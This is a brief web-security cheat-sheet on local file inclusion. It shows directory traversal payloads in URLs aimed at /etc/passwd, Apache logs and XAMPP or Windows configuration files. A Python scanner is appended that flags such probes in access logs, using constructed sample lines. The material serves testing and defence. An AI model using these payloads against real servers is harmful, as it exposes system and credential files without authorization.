File Inclusion
📂 Local File Inclusion
Quick Checks
Look for any parameter that references a file, such as http://vulnerable_host/preview.php?file=myfile.php
Testing
- Check whether system files can be included
If the web server is a Linux machine:
https://vulnerable_host/preview.php?file=../../../../etc/passwd
You can also try to read files such as /etc/passwd, /etc/hosts, /var/log/apache2/access.log
If the web server is a Windows machine (XAMPP):
http://localhost/index.php?page=../../../../xampp/apache/conf/httpd.conf
You can also try to read files such as C:\Windows\win.ini, C:\xampp\php\php.ini
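
Added example (not part of the original notes): the same checks seen from the defender's side, as a scan of a web server access log that flags query parameters carrying directory traversal or one of the file paths named above. The log lines, the IP address and all function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Files this page names as typical read targets (lower-cased, forward slashes).
SENSITIVE = ("etc/passwd", "etc/hosts", "var/log/apache2/access.log",
             "xampp/apache/conf/httpd.conf", "windows/win.ini", "xampp/php/php.ini")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def normalise(value, max_rounds=3):
    """Undo repeated URL-encoding, unify path separators and case."""
    for _ in range(max_rounds):
        value = unquote(value)
    return value.replace("\\", "/").lower()


def suspicious_params(url):
    """Return [(param, normalised_value, reason)] for file-inclusion probes in a URL."""
    findings = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = normalise(raw)
        if ".." in value.split("/"):
            findings.append((name, value, "directory traversal"))
        elif any(target in value for target in SENSITIVE):
            findings.append((name, value, "sensitive file path"))
    return findings


def scan_access_log(lines):
    """Yield (line_number, finding) for each flagged request in access-log lines."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for finding in suspicious_params(match.group(1)):
                yield number, finding


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /preview.php?file=myfile.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /preview.php?file=../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=../../../../xampp/apache/conf/httpd.conf HTTP/1.1" 200 20480',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=C:%5CWindows%5Cwin.ini HTTP/1.1" 200 92',
]

if __name__ == "__main__":
    for number, (param, value, reason) in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {param}={value} ({reason})")
```

A 200 response with an unusual body size on a flagged request is the case worth triaging first, since it suggests the file was actually returned.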